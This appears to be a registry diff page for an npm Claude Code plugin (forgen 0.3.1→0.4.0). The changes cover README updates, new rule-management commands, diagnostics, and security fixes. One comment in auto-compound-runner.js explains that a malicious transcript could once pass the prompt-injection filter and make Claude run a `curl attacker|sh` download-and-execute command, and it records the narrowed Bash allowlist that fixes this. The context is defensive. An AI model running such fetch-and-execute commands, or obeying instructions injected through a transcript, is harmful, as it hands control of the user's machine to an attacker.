npm - @wooojin/forgen - Versions diffs - 0.3.1 → 0.4.0 - Mend

@wooojin/forgen 0.3.1 → 0.4.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (125) hide show

package/.claude-plugin/plugin.json +7 -2
package/CHANGELOG.md +164 -0
package/README.ja.md +90 -7
package/README.ko.md +44 -1
package/README.md +128 -9
package/README.zh.md +90 -7
package/dist/cli.js +140 -8
package/dist/core/auto-compound-runner.js +16 -5
package/dist/core/dashboard.js +11 -4
package/dist/core/doctor.d.ts +6 -1
package/dist/core/doctor.js +85 -11
package/dist/core/global-config.d.ts +2 -2
package/dist/core/global-config.js +6 -14
package/dist/core/harness.d.ts +3 -5
package/dist/core/harness.js +34 -338
package/dist/core/inspect-cli.js +65 -5
package/dist/core/installer.d.ts +10 -0
package/dist/core/installer.js +185 -0
package/dist/core/paths.d.ts +0 -34
package/dist/core/paths.js +0 -35
package/dist/core/settings-injector.d.ts +13 -0
package/dist/core/settings-injector.js +167 -0
package/dist/core/settings-lock.d.ts +35 -2
package/dist/core/settings-lock.js +65 -7
package/dist/core/spawn.js +100 -39
package/dist/core/state-gc.d.ts +49 -0
package/dist/core/state-gc.js +163 -0
package/dist/core/stats-cli.d.ts +15 -0
package/dist/core/stats-cli.js +143 -0
package/dist/core/uninstall.d.ts +1 -0
package/dist/core/uninstall.js +36 -5
package/dist/core/v1-bootstrap.js +11 -3
package/dist/engine/classify-enforce-cli.d.ts +8 -0
package/dist/engine/classify-enforce-cli.js +61 -0
package/dist/engine/compound-cli.d.ts +27 -2
package/dist/engine/compound-cli.js +69 -16
package/dist/engine/compound-export.d.ts +15 -0
package/dist/engine/compound-export.js +32 -5
package/dist/engine/compound-loop.js +3 -2
package/dist/engine/enforce-classifier.d.ts +31 -0
package/dist/engine/enforce-classifier.js +123 -0
package/dist/engine/learn-cli.js +52 -0
package/dist/engine/lifecycle/bypass-detector.d.ts +34 -0
package/dist/engine/lifecycle/bypass-detector.js +82 -0
package/dist/engine/lifecycle/lifecycle-cli.d.ts +7 -0
package/dist/engine/lifecycle/lifecycle-cli.js +102 -0
package/dist/engine/lifecycle/meta-cli.d.ts +4 -0
package/dist/engine/lifecycle/meta-cli.js +7 -0
package/dist/engine/lifecycle/meta-reclassifier.d.ts +78 -0
package/dist/engine/lifecycle/meta-reclassifier.js +351 -0
package/dist/engine/lifecycle/orchestrator.d.ts +32 -0
package/dist/engine/lifecycle/orchestrator.js +131 -0
package/dist/engine/lifecycle/signals.d.ts +30 -0
package/dist/engine/lifecycle/signals.js +142 -0
package/dist/engine/lifecycle/trigger-t1-correction.d.ts +23 -0
package/dist/engine/lifecycle/trigger-t1-correction.js +78 -0
package/dist/engine/lifecycle/trigger-t2-violation.d.ts +18 -0
package/dist/engine/lifecycle/trigger-t2-violation.js +42 -0
package/dist/engine/lifecycle/trigger-t3-bypass.d.ts +17 -0
package/dist/engine/lifecycle/trigger-t3-bypass.js +39 -0
package/dist/engine/lifecycle/trigger-t4-decay.d.ts +18 -0
package/dist/engine/lifecycle/trigger-t4-decay.js +40 -0
package/dist/engine/lifecycle/trigger-t5-conflict.d.ts +16 -0
package/dist/engine/lifecycle/trigger-t5-conflict.js +78 -0
package/dist/engine/lifecycle/types.d.ts +52 -0
package/dist/engine/lifecycle/types.js +7 -0
package/dist/engine/match-eval-log.js +45 -0
package/dist/engine/rule-toggle-cli.d.ts +13 -0
package/dist/engine/rule-toggle-cli.js +76 -0
package/dist/engine/solution-format.d.ts +0 -2
package/dist/engine/solution-format.js +0 -4
package/dist/engine/solution-matcher.d.ts +8 -0
package/dist/engine/solution-matcher.js +7 -4
package/dist/engine/solution-outcomes.d.ts +4 -0
package/dist/engine/solution-outcomes.js +174 -97
package/dist/engine/solution-writer.d.ts +8 -5
package/dist/engine/solution-writer.js +43 -19
package/dist/fgx.js +9 -2
package/dist/forge/cli.js +7 -7
package/dist/forge/evidence-processor.js +10 -2
package/dist/hooks/context-guard.js +86 -1
package/dist/hooks/hook-config.d.ts +9 -1
package/dist/hooks/hook-config.js +25 -3
package/dist/hooks/internal/run-lifecycle-check.d.ts +2 -0
package/dist/hooks/internal/run-lifecycle-check.js +32 -0
package/dist/hooks/notepad-injector.js +6 -3
package/dist/hooks/permission-handler.d.ts +10 -2
package/dist/hooks/permission-handler.js +31 -12
package/dist/hooks/post-tool-use.js +62 -0
package/dist/hooks/pre-tool-use.js +67 -5
package/dist/hooks/secret-filter.d.ts +10 -0
package/dist/hooks/secret-filter.js +26 -0
package/dist/hooks/session-recovery.js +15 -7
package/dist/hooks/shared/atomic-write.d.ts +8 -1
package/dist/hooks/shared/atomic-write.js +17 -3
package/dist/hooks/shared/hook-response.d.ts +11 -2
package/dist/hooks/shared/hook-response.js +20 -7
package/dist/hooks/shared/hook-timing.js +10 -1
package/dist/hooks/shared/safe-regex.d.ts +25 -0
package/dist/hooks/shared/safe-regex.js +50 -0
package/dist/hooks/shared/stop-triggers.d.ts +19 -0
package/dist/hooks/shared/stop-triggers.js +19 -0
package/dist/hooks/solution-injector.d.ts +21 -0
package/dist/hooks/solution-injector.js +60 -1
package/dist/hooks/stop-guard.d.ts +84 -0
package/dist/hooks/stop-guard.js +482 -0
package/dist/mcp/solution-reader.d.ts +2 -0
package/dist/mcp/solution-reader.js +28 -1
package/dist/mcp/tools.js +24 -4
package/dist/preset/preset-manager.js +12 -2
package/dist/store/evidence-store.d.ts +15 -0
package/dist/store/evidence-store.js +55 -6
package/dist/store/profile-store.d.ts +9 -0
package/dist/store/profile-store.js +25 -4
package/dist/store/rule-lifecycle.d.ts +23 -0
package/dist/store/rule-lifecycle.js +63 -0
package/dist/store/rule-store.d.ts +21 -0
package/dist/store/rule-store.js +133 -13
package/dist/store/types.d.ts +83 -0
package/dist/store/types.js +7 -1
package/hooks/hook-registry.json +1 -0
package/hooks/hooks.json +6 -1
package/package.json +10 -2
package/plugin.json +7 -2
package/scripts/postinstall.js +52 -5

package/README.zh.md CHANGED Viewed

@@ -3,18 +3,18 @@
 </p>
 <p align="center">
-  <strong>Claude Code 个性化引擎。</strong><br/>
-  <strong>用得越多，Claude 越懂你。</strong>
+  <strong>当 Claude 说"完成了", forgen 让它拿出证据。</strong><br/>
+  按轮次的自我验证 + 个性化规则, <strong>额外 API 成本 $0</strong>。
 </p>
 <p align="center">
-  <a href="https://www.npmjs.com/package//forgen"><img src="https://img.shields.io/npm/v//forgen.svg" alt="npm version"/></a>
+  <a href="https://www.npmjs.com/package/@wooojin/forgen"><img src="https://img.shields.io/npm/v/@wooojin/forgen.svg" alt="npm version"/></a>
   <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-yellow.svg" alt="License: MIT"/></a>
   <a href="https://nodejs.org"><img src="https://img.shields.io/badge/node-%3E%3D20-brightgreen.svg" alt="Node.js >= 20"/></a>
 </p>
 <p align="center">
-  <a href="#使用-forgen-会发生什么">工作流程</a> &middot;
+  <a href="#第一次拦截-30秒">第一次拦截</a> &middot;
   <a href="#快速开始">快速开始</a> &middot;
   <a href="#工作原理">工作原理</a> &middot;
   <a href="#4轴个性化">4轴</a> &middot;
@@ -32,8 +32,48 @@
 ---
+## 第一次拦截 (30秒)
+你被骗过很多次了: Claude 说"测试通过, 实现完成" — 真正运行 — 却不工作。forgen 填补这个缺口。
+```
+You:     "实现登录 handler。"
+Claude:  ...编辑文件...
+Claude:  "구현 완료했습니다。"
+[forgen:stop-guard/L1-e2e-before-done]
+没有 Docker e2e 证据 (~/.forgen/state/e2e-result.json, 1小时内)。
+立即执行后再回答。
+Claude:  "撤回完成声明。证据文件不存在。先执行 e2e..."
+         ...bash tests/e2e/docker/run-test.sh 执行...
+         "63/63 通过。구현 완료했습니다。"
+[forgen] ✓ approved
+```
+**刚刚发生了什么**: Claude 的 Stop hook 被你定义的规则 (`L1-e2e-before-done`) 拦截。Claude 读取了 block `reason`, 撤回过早的完成声明, 产生证据, 重新提交。**零额外 API 调用** — 全部发生在 Claude 本来就会产出的同一个 session turn 内。
+这就是 **Mech-B 自检 prompt-inject**。它工作是因为 Claude Code 的 Stop hook 接受 `decision: "block"` + `reason`, 而 Claude 在下一轮把那个 reason 作为输入读取。我们用 10 个场景、$1.74 总成本端到端验证 ([A1 spike report](docs/spike/mech-b-a1-verification-report.md))。
+🎬 **观看实际运行** (27秒):
+```bash
+# 现场观看完整循环 — 真实的 hook、真实的规则、真实的 block/approve 周期
+bash docs/demo/mech-b-demo.sh
+# 或重放预录制的 asciinema cast
+asciinema play docs/demo/mech-b-block-unblock.cast
+```
+关于 demo 中"真实 vs 模拟"的详情见 [`docs/demo/README.md`](docs/demo/README.md)。
+---
 ## 两个开发者。同一个 Claude。完全不同的行为。
+上述 Trust Layer 是一根支柱。另一根是个性化 — 第一次拦截之后继续使用 forgen 的理由。
 开发者 A 做事谨慎。他希望 Claude 运行所有测试、解释原因，在触碰当前文件以外的内容前先征求确认。
 开发者 B 追求速度。他希望 Claude 自行假设、直接修复相关文件、用两行汇报结果。
@@ -57,7 +97,7 @@ forgen 实现了这一切。它对你的工作风格进行画像、从你的纠
 ### 首次运行（仅一次，约1分钟）
 ```bash
-npm install -g /forgen
+npm install -g @wooojin/forgen
 forgen
 ```
@@ -117,7 +157,7 @@ Claude 调用 `correction-record` MCP 工具。纠正作为结构化证据存储
 ```bash
 # 1. 安装
-npm install -g /forgen
+npm install -g @wooojin/forgen
 # 2. 首次运行 — 4题引导问卷（英语/韩语选择）
 forgen
@@ -131,6 +171,35 @@ forgen
 - **Node.js** >= 20（SQLite 会话搜索推荐 >= 22）
 - **Claude Code** 已安装并认证（`npm i -g @anthropic-ai/claude-code`）
+> **厂商依赖:** forgen 封装了 Claude Code。Anthropic API 或 Claude Code 的变更可能影响其行为。已在 Claude Code 1.0.x 版本下测试。
+---
+## 为什么选择 forgen
+|                        | Generic Claude Code | oh-my-claudecode | forgen          |
+|------------------------|:-------------------:|:----------------:|:---------------:|
+| 对所有人相同           | Yes                 | Yes              | **No**          |
+| 从纠正中学习           | No                  | No               | **Yes**         |
+| 基于证据的生命周期     | No                  | No               | **Yes**         |
+| 自动淘汰不良模式       | No                  | No               | **Yes**         |
+| 个性化规则             | No                  | No               | **Yes**         |
+| 运行时依赖             | -                   | many             | **3**           |
+### 适用场景
+**适合使用:**
+- Claude 可以在数周内学习你的模式的长期项目
+- 对 AI 行为方式有强烈偏好的开发者
+- 有重复模式、能从 Compound 知识中获益的代码库
+**不适合使用:**
+- 一次性脚本或临时原型
+- 没有 Claude Code 的环境
+- 需要所有成员 AI 行为完全一致的团队（forgen 是个人化的，不面向团队）
+**forgen + oh-my-claudecode:** 可以一起使用。OMC 负责编排（智能体、工作流）; forgen 负责个性化（档案、学习）。详情请参阅 [共存指南](docs/guides/with-omc.md)。
 ---
 ## 工作原理
@@ -374,13 +443,27 @@ forgen forge --export           # 导出档案
 ### 状态查看
 ```bash
+forgen stats                    # 单屏 Trust Layer 仪表盘 (规则·纠正·block 7天)
+forgen last-block               # 最近一次拦截事件详情
 forgen inspect profile          # 4轴档案 + pack + facet
 forgen inspect rules            # 活跃/抑制的规则
-forgen inspect evidence         # 纠正历史
+forgen inspect corrections      # 纠正历史 (alias: evidence)
 forgen inspect session          # 当前会话状态
+forgen inspect violations       # 最近的拦截记录 (--last N)
 forgen me                       # 个人仪表盘（inspect profile 的快捷方式）
 ```
+### 规则管理
+```bash
+forgen rule list                # 列出活跃 + suppressed 规则
+forgen rule suppress <id>       # 禁用规则 (hard 规则拒绝)
+forgen rule activate <id>       # 重新激活 suppressed 规则
+forgen rule scan [--apply]      # 运行生命周期触发器 (晋升/降级/退役)
+forgen rule health-scan         # 扫描 drift → Mech 降级候选
+forgen rule classify            # 为旧规则自动提议 enforce_via
+```
 ### 知识管理
 ```bash

package/dist/cli.js CHANGED Viewed

@@ -159,23 +159,151 @@ const commands = [
     },
     {
         name: 'doctor',
-        description: 'Diagnostics',
-        handler: async (_args) => {
+        description: 'Diagnostics (--prune-state to GC stale session files)',
+        handler: async (args) => {
             const { runDoctor } = await import('./core/doctor.js');
-            await runDoctor();
+            await runDoctor({ pruneState: args.includes('--prune-state') });
         },
     },
     // install --plugin 제거됨 — postinstall이 유일한 설치 경로
     // 수동 재설치: node scripts/postinstall.js
     {
         name: 'uninstall',
-        description: 'Remove forgen from settings [--force]',
+        description: 'Remove forgen from settings [--force] [--purge (also deletes ~/.forgen/)]',
         handler: async (args) => {
             const { handleUninstall } = await import('./core/uninstall.js');
-            await handleUninstall(process.cwd(), { force: args.includes('--force') });
+            await handleUninstall(process.cwd(), {
+                force: args.includes('--force'),
+                purge: args.includes('--purge'),
+            });
+        },
+    },
+    {
+        name: 'rule',
+        description: 'Rule management (list|suppress|activate|scan|health-scan|classify)',
+        handler: async (args) => {
+            await handleRuleNamespace(args);
+        },
+    },
+    {
+        name: 'classify-enforce',
+        aliases: ['rule-classify'],
+        description: '[alias: rule classify] Propose enforce_via for rules (ADR-001 migration).',
+        handler: async (args) => {
+            const { handleClassifyEnforce } = await import('./engine/classify-enforce-cli.js');
+            await handleClassifyEnforce(args);
+        },
+    },
+    {
+        name: 'rule-meta-scan',
+        description: '[alias: rule health-scan] Scan drift for stuck-loop events and demote Mech-A rules.',
+        handler: async (args) => {
+            const { handleRuleMetaScan } = await import('./engine/lifecycle/meta-cli.js');
+            await handleRuleMetaScan(args);
+        },
+    },
+    {
+        name: 'lifecycle-scan',
+        description: '[alias: rule scan] Run all rule lifecycle triggers (T1~T5 + Meta).',
+        handler: async (args) => {
+            const { handleLifecycleScan } = await import('./engine/lifecycle/lifecycle-cli.js');
+            await handleLifecycleScan(args);
+        },
+    },
+    {
+        name: 'stats',
+        description: 'One-screen dashboard: active rules, corrections, blocks/bypass/drift (7d).',
+        handler: async (args) => {
+            const { handleStats } = await import('./core/stats-cli.js');
+            await handleStats(args);
+        },
+    },
+    {
+        name: 'last-block',
+        description: 'Show the most recent Mech-A/B block event with rule detail (R6-UX2).',
+        handler: async (_args) => {
+            const { handleInspect } = await import('./core/inspect-cli.js');
+            await handleInspect(['violations', '--last', '1']);
+        },
+    },
+    {
+        name: 'suppress-rule',
+        description: '[alias: rule suppress] Disable a rule by id/prefix. Hard rules refused.',
+        handler: async (args) => {
+            const { handleSuppressRule } = await import('./engine/rule-toggle-cli.js');
+            await handleSuppressRule(args);
+        },
+    },
+    {
+        name: 'activate-rule',
+        description: '[alias: rule activate] Re-activate a suppressed rule by id/prefix.',
+        handler: async (args) => {
+            const { handleActivateRule } = await import('./engine/rule-toggle-cli.js');
+            await handleActivateRule(args);
         },
     },
 ];
+// ---------------------------------------------------------------------------
+// `forgen rule <subcommand>` — user-facing namespace (R9-IA1)
+// Thin dispatcher that routes to existing handlers. Top-level legacy commands
+// (suppress-rule, activate-rule, lifecycle-scan, rule-meta-scan, classify-enforce)
+// remain as backward-compatible aliases.
+// ---------------------------------------------------------------------------
+async function handleRuleNamespace(args) {
+    const sub = args[0];
+    const rest = args.slice(1);
+    if (!sub || sub === 'help' || sub === '--help' || sub === '-h') {
+        console.log(`
+  forgen rule — manage personalization rules
+  Usage:
+    forgen rule list                       List all rules (alias: inspect rules)
+    forgen rule suppress <id-or-prefix>    Disable a rule (hard rules refused)
+    forgen rule activate <id-or-prefix>    Re-activate a suppressed rule
+    forgen rule scan [--apply]             Run lifecycle triggers (promote/demote/retire)
+    forgen rule health-scan [--apply]      Scan drift → Mech downgrade candidates
+    forgen rule classify [--apply] [--force]
+                                           Propose enforce_via for legacy rules
+`);
+        return;
+    }
+    switch (sub) {
+        case 'list': {
+            const { handleInspect } = await import('./core/inspect-cli.js');
+            await handleInspect(['rules', ...rest]);
+            return;
+        }
+        case 'suppress': {
+            const { handleSuppressRule } = await import('./engine/rule-toggle-cli.js');
+            await handleSuppressRule(rest);
+            return;
+        }
+        case 'activate': {
+            const { handleActivateRule } = await import('./engine/rule-toggle-cli.js');
+            await handleActivateRule(rest);
+            return;
+        }
+        case 'scan': {
+            const { handleLifecycleScan } = await import('./engine/lifecycle/lifecycle-cli.js');
+            await handleLifecycleScan(rest);
+            return;
+        }
+        case 'health-scan': {
+            const { handleRuleMetaScan } = await import('./engine/lifecycle/meta-cli.js');
+            await handleRuleMetaScan(rest);
+            return;
+        }
+        case 'classify': {
+            const { handleClassifyEnforce } = await import('./engine/classify-enforce-cli.js');
+            await handleClassifyEnforce(rest);
+            return;
+        }
+        default: {
+            console.error(`[forgen] Unknown rule subcommand: ${sub}\n  Run "forgen rule help" for options.`);
+            process.exit(1);
+        }
+    }
+}
 /** 최소 편집 거리 (유사 명령 제안용) */
 function levenshtein(a, b) {
     const m = a.length, n = b.length;
@@ -298,8 +426,12 @@ function printHelp() {
   Commands:
     forgen forge                    Personalize your coding profile
     forgen onboarding               Run 2-question onboarding
-    forgen inspect [profile|rules|evidence|session]
-                                    Inspect v1 state
+    forgen inspect [profile|rules|corrections|session]
+                                    Inspect v1 state (alias: evidence → corrections)
+    forgen rule <list|suppress|activate|scan|health-scan|classify>
+                                    Rule management (see: forgen rule help)
+    forgen stats                    One-screen trust-layer dashboard
+    forgen last-block               Show the most recent block event
     forgen compound                 Manage accumulated knowledge
     forgen dashboard                Compound system dashboard
     forgen me                       Personal dashboard
@@ -308,7 +440,7 @@ function printHelp() {
     forgen mcp                      MCP server management
     forgen skill promote|list       Skill management
     forgen notepad show|add|clear   Session notepad
-    forgen doctor                   System diagnostics
+    forgen doctor [--prune-state]   System diagnostics (+ daily T4 decay on prune)
     forgen uninstall                Remove forgen
   Harness mode (default):

package/dist/core/auto-compound-runner.js CHANGED Viewed

@@ -14,6 +14,7 @@ import * as path from 'node:path';
 import * as os from 'node:os';
 import { execFileSync } from 'node:child_process';
 import { containsPromptInjection, filterSolutionContent } from '../hooks/prompt-injection-filter.js';
+import { redactSecrets } from '../hooks/secret-filter.js';
 import { createEvidence, saveEvidence, promoteSessionCandidates } from '../store/evidence-store.js';
 import { loadProfile } from '../store/profile-store.js';
 /** Auto-compound에 사용할 모델 — background 추출이므로 haiku로 충분 */
@@ -212,9 +213,16 @@ function mergeOrCreateBehavior(dir, newContent, kind, today) {
     return false;
 }
 try {
-    const summary = extractSummary(transcriptPath);
-    if (summary.length < 200)
+    const rawSummary = extractSummary(transcriptPath);
+    if (rawSummary.length < 200)
         process.exit(0);
+    // R5-G2 (P0 security): transcript 를 Claude 로 송신하기 전 API key / 토큰 / 비밀번호 /
+    // private key blocks 를 [REDACTED:...] 로 치환. 사용자가 채팅에 pasted 한 자격증명이
+    // auto-compound 를 통해 외부 API 로 누출되는 채널 차단.
+    const { redacted: summary, hits: secretHits } = redactSecrets(rawSummary);
+    if (secretHits.length > 0) {
+        process.stderr.write(`[forgen-auto-compound] redacted ${secretHits.length} secret(s) before send: ${secretHits.map((s) => s.name).join(', ')}\n`);
+    }
     // 보안: 프롬프트 인젝션이 포함된 transcript는 분석하지 않음
     if (containsPromptInjection(summary)) {
         process.exit(0);
@@ -279,10 +287,13 @@ try {
 ---
 ${sanitizedSummary.slice(0, 6000)}
 ---`;
+    // P1-S1 fix (2026-04-20): 과거에는 `--allowedTools Bash`로 전체 Bash 권한을 줘서
+    // 악성 transcript(공급망 인젝션)가 filter를 우회해 `curl attacker|sh` 같은 명령을
+    // 피해자 권한으로 실행시킬 수 있었다. 이제 `Bash(forgen compound:*)`로 좁혀 Claude
+    // 가 compound 추출용 forgen CLI 호출만 가능하게 한다. filter-bypass 시에도 임의
+    // 명령 실행 차단.
     try {
-        execClaudeRetry(['-p', solutionPrompt, '--allowedTools', 'Bash', '--model', COMPOUND_MODEL], {
-            cwd, timeout: 90_000, stdio: ['pipe', 'ignore', 'pipe'],
-        });
+        execClaudeRetry(['-p', solutionPrompt, '--allowedTools', 'Bash(forgen compound:*)', '--model', COMPOUND_MODEL], { cwd, timeout: 90_000, stdio: ['pipe', 'ignore', 'pipe'] });
     }
     catch (e) {
         process.stderr.write(`[forgen-auto-compound] solution extraction: ${e instanceof Error ? e.message : String(e)}\n`);

package/dist/core/dashboard.js CHANGED Viewed

@@ -13,7 +13,14 @@
  */
 import * as fs from 'node:fs';
 import * as path from 'node:path';
-import { ME_SOLUTIONS, ME_RULES, ME_BEHAVIOR, STATE_DIR, V1_EVIDENCE_DIR, } from './paths.js';
+import { createRequire } from 'node:module';
+// P0-1 fix (2026-04-20): ESM `"type": "module"` 프로젝트에서 `require`가 글로벌에
+// 없어 이전에는 renderFitnessSummary 안의 `require('../engine/solution-fitness.js')`가
+// 항상 ReferenceError로 catch 경로에 떨어져 Solution Fitness 대시보드 섹션이
+// 조용히 무효화됐다 (정상처럼 "아직 outcome 이벤트 데이터 없음" 출력).
+// createRequire로 CJS require를 ESM 환경에 부트스트랩 — session-store.ts 패턴 동일.
+const require = createRequire(import.meta.url);
+import { ME_SOLUTIONS, ME_RULES, ME_BEHAVIOR, STATE_DIR, } from './paths.js';
 import { parseFrontmatterOnly } from '../engine/solution-format.js';
 import { readMatchEvalLog } from '../engine/match-eval-log.js';
 // ── ANSI color helpers ──
@@ -361,11 +368,11 @@ export function collectLearningCurve() {
     const axisCounts = new Map();
     const uniqueDays = new Set();
     try {
-        if (fs.existsSync(V1_EVIDENCE_DIR)) {
-            const files = fs.readdirSync(V1_EVIDENCE_DIR).filter(f => f.endsWith('.json'));
+        if (fs.existsSync(ME_BEHAVIOR)) {
+            const files = fs.readdirSync(ME_BEHAVIOR).filter(f => f.endsWith('.json'));
             for (const f of files) {
                 try {
-                    const data = JSON.parse(fs.readFileSync(path.join(V1_EVIDENCE_DIR, f), 'utf-8'));
+                    const data = JSON.parse(fs.readFileSync(path.join(ME_BEHAVIOR, f), 'utf-8'));
                     if (!data.timestamp)
                         continue;
                     const ts = new Date(data.timestamp).getTime();

package/dist/core/doctor.d.ts CHANGED Viewed

@@ -1 +1,6 @@
-export declare function runDoctor(): Promise<void>;
+export interface DoctorOptions {
+    /** When true, delete stale session-scoped state files instead of just
+     *  reporting bloat. Triggered by `forgen doctor --prune-state`. */
+    pruneState?: boolean;
+}
+export declare function runDoctor(opts?: DoctorOptions): Promise<void>;

package/dist/core/doctor.js CHANGED Viewed

@@ -2,14 +2,24 @@ import * as fs from 'node:fs';
 import * as os from 'node:os';
 import * as path from 'node:path';
 import { execFileSync } from 'node:child_process';
-import { FORGEN_HOME, LAB_DIR, ME_BEHAVIOR, ME_DIR, ME_PHILOSOPHY, ME_SOLUTIONS, ME_RULES, ME_SKILLS, PACKS_DIR, SESSIONS_DIR, STATE_DIR } from './paths.js';
+import { FORGEN_HOME, LAB_DIR, ME_BEHAVIOR, ME_DIR, ME_SOLUTIONS, ME_RULES, ME_SKILLS, PACKS_DIR, SESSIONS_DIR, STATE_DIR } from './paths.js';
 import { getTimingStats } from '../hooks/shared/hook-timing.js';
+import { countSessionScopedFiles, pruneState } from './state-gc.js';
 /** ~/.claude/projects/ — Claude Code 세션 저장 경로 */
 const CLAUDE_PROJECTS_DIR = path.join(os.homedir(), '.claude', 'projects');
+let currentSection = '';
+let failedChecks = [];
+function section(name) {
+    currentSection = name;
+    console.log(`  [${name}]`);
+}
 function check(label, condition, hint) {
     const icon = condition ? '✓' : '✗';
     const hintStr = !condition && hint ? ` — ${hint}` : '';
     console.log(`  ${icon} ${label}${hintStr}`);
+    if (!condition) {
+        failedChecks.push({ section: currentSection, label, hint });
+    }
 }
 function exists(p) {
     return fs.existsSync(p);
@@ -24,15 +34,16 @@ function commandExists(cmd) {
         return false;
     }
 }
-export async function runDoctor() {
+export async function runDoctor(opts = {}) {
+    failedChecks = [];
     console.log('\n  Forgen — Diagnostics\n');
-    console.log('  [Tools]');
+    section('Tools');
     check('claude CLI', commandExists('claude'));
     check('tmux', commandExists('tmux'));
     check('git', commandExists('git'));
     check('gh (GitHub CLI)', commandExists('gh'), 'Required for team PR features: brew install gh');
     console.log();
-    console.log('  [Plugins]');
+    section('Plugins');
     const ralphLoopInstalled = exists(path.join(os.homedir(), '.claude', 'plugins', 'cache', 'claude-plugins-official', 'ralph-loop'));
     check('ralph-loop plugin', ralphLoopInstalled, 'Required for ralph mode auto-iteration. Install: claude plugins install ralph-loop');
     // forgen 플러그인 캐시 디렉토리 확인 — 훅 실행의 필수 전제
@@ -67,7 +78,7 @@ export async function runDoctor() {
     }
     check('forgen plugin registered & installPath exists', pluginRegistered, 'Plugin registered but installPath missing on disk. Fix: npm run build && node scripts/postinstall.js');
     console.log();
-    console.log('  [Directories]');
+    section('Directories');
     check('~/.forgen/', exists(FORGEN_HOME));
     check('~/.forgen/me/', exists(ME_DIR));
     check('~/.forgen/me/solutions/', exists(ME_SOLUTIONS));
@@ -75,13 +86,24 @@ export async function runDoctor() {
     check('~/.forgen/me/rules/', exists(ME_RULES));
     check('~/.forgen/packs/', exists(PACKS_DIR));
     check('~/.forgen/sessions/', exists(SESSIONS_DIR));
+    // R9-IA5: warn if a user dropped rule files at ~/.forgen/rules/ by mistake.
+    // That path is NOT loaded — personal rules live at ~/.forgen/me/rules/.
+    const legacyRulesPath = path.join(FORGEN_HOME, 'rules');
+    if (exists(legacyRulesPath) && legacyRulesPath !== ME_RULES) {
+        try {
+            const files = fs.readdirSync(legacyRulesPath).filter((f) => f.endsWith('.json'));
+            if (files.length > 0) {
+                check(`~/.forgen/rules/ (${files.length} orphan file(s))`, false, `This path is NOT loaded. Move files to ~/.forgen/me/rules/ or delete them.`);
+            }
+        }
+        catch {
+            // permission / symlink issue — diagnostics must not crash
+        }
+    }
     console.log();
-    console.log('  [Philosophy]');
-    check('philosophy.json', exists(ME_PHILOSOPHY));
-    console.log();
-    console.log('  [Environment]');
-    check('Inside tmux session', !!process.env.TMUX);
-    check('FORGEN_HARNESS env var', (process.env.FORGEN_HARNESS ?? process.env.COMPOUND_HARNESS) === '1');
+    section('Environment');
+    check('Inside tmux session', !!process.env.TMUX, 'FORGEN auto-compound relies on tmux. Launch: tmux new -s forgen');
+    check('FORGEN_HARNESS env var', (process.env.FORGEN_HARNESS ?? process.env.COMPOUND_HARNESS) === '1', 'Set by `forgen` / `fgx` launcher. Hooks assume harness mode is active.');
     console.log();
     // 솔루션/규칙 수
     if (exists(ME_SOLUTIONS)) {
@@ -305,6 +327,34 @@ export async function runDoctor() {
         }
         console.log();
     }
+    // State bloat check — session-scoped files accumulate until pruned.
+    console.log('  [State Hygiene]');
+    const sessionFiles = countSessionScopedFiles();
+    if (sessionFiles === 0) {
+        console.log('  ✓ no session-scoped state files');
+    }
+    else if (sessionFiles < 500) {
+        console.log(`  ✓ ${sessionFiles} session-scoped files (under threshold)`);
+    }
+    else {
+        console.log(`  ⚠ ${sessionFiles} session-scoped files (bloat threshold 500)`);
+        console.log('    Run: forgen doctor --prune-state   (removes files older than 7 days)');
+    }
+    if (opts.pruneState) {
+        const report = pruneState({ dryRun: false });
+        const mb = (report.bytesFreed / 1024 / 1024).toFixed(2);
+        console.log(`  → Pruned ${report.pruned}/${report.scanned} files (${mb} MB freed, >${report.retentionDays}d old)`);
+        // ADR-002 T4 — 90d 미주입 rule retire. pruneState 와 함께 "하루 한번 정돈" 의미 공유.
+        try {
+            const { runDailyT4Decay } = await import('./state-gc.js');
+            const t4 = await runDailyT4Decay({ dryRun: false });
+            if (t4.retired > 0) {
+                console.log(`  → Retired ${t4.retired} rule(s) (T4 time-decay): ${t4.sample.join(', ')}`);
+            }
+        }
+        catch { /* fail-open */ }
+    }
+    console.log();
     // 현재 디렉토리 git 정보
     console.log('  [Git]');
     try {
@@ -316,4 +366,28 @@ export async function runDoctor() {
         console.log('  git remote: (none)');
     }
     console.log();
+    // [Summary] — 최종 상태 요약과 복구 액션을 한눈에 보이게
+    console.log('  [Summary]');
+    if (failedChecks.length === 0) {
+        console.log('  ✓ All diagnostics passed. Forgen is ready.');
+    }
+    else {
+        console.log(`  ✗ ${failedChecks.length} check(s) failed:\n`);
+        const bySection = new Map();
+        for (const f of failedChecks) {
+            if (!bySection.has(f.section))
+                bySection.set(f.section, []);
+            bySection.get(f.section).push(f);
+        }
+        for (const [sec, items] of bySection) {
+            console.log(`    [${sec}]`);
+            for (const item of items) {
+                console.log(`      • ${item.label}`);
+                if (item.hint)
+                    console.log(`        → ${item.hint}`);
+            }
+        }
+        console.log('\n  Run `forgen doctor` again after applying the fixes above.');
+    }
+    console.log();
 }

package/dist/core/global-config.d.ts CHANGED Viewed

@@ -37,7 +37,7 @@ export interface GlobalConfig {
     /** 레거시 마이그레이션 백업 경로 */
     legacy_backup?: string;
 }
-/** v1 config 로드 (~/.forgen/config.json 우선, 레거시 폴백) */
+/** 글로벌 config 로드 (~/.forgen/config.json) */
 export declare function loadGlobalConfig(): GlobalConfig;
-/** v1 config 저장 (~/.forgen/config.json) */
+/** 글로벌 config 저장 (~/.forgen/config.json) */
 export declare function saveGlobalConfig(config: GlobalConfig): void;

package/dist/core/global-config.js CHANGED Viewed

@@ -1,26 +1,18 @@
 import * as fs from 'node:fs';
 import * as path from 'node:path';
-import { GLOBAL_CONFIG, V1_GLOBAL_CONFIG } from './paths.js';
-/** v1 config 로드 (~/.forgen/config.json 우선, 레거시 폴백) */
+import { GLOBAL_CONFIG } from './paths.js';
+/** 글로벌 config 로드 (~/.forgen/config.json) */
 export function loadGlobalConfig() {
-    // v1 경로 우선
-    if (fs.existsSync(V1_GLOBAL_CONFIG)) {
-        try {
-            return JSON.parse(fs.readFileSync(V1_GLOBAL_CONFIG, 'utf-8'));
-        }
-        catch { /* fall through */ }
-    }
-    // 레거시 폴백
     if (fs.existsSync(GLOBAL_CONFIG)) {
         try {
